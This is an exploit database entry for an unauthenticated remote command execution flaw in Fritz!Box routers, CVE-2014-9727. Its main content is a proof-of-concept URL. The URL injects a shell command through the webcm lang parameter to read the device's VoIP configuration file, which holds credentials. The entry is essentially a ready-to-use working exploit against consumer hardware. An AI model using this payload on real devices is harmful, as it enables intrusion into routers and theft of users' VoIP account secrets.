Fritz!Box - Remote Command Execution



EKU-ID: 38006 CVE: OSVDB-103289;CVE-2014-9727 OSVDB-ID:
Author: 0x4148 Published: 2014-05-01 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


App : Fritz!Box
Author : 0x4148

Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw

Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26

#0x4148_rise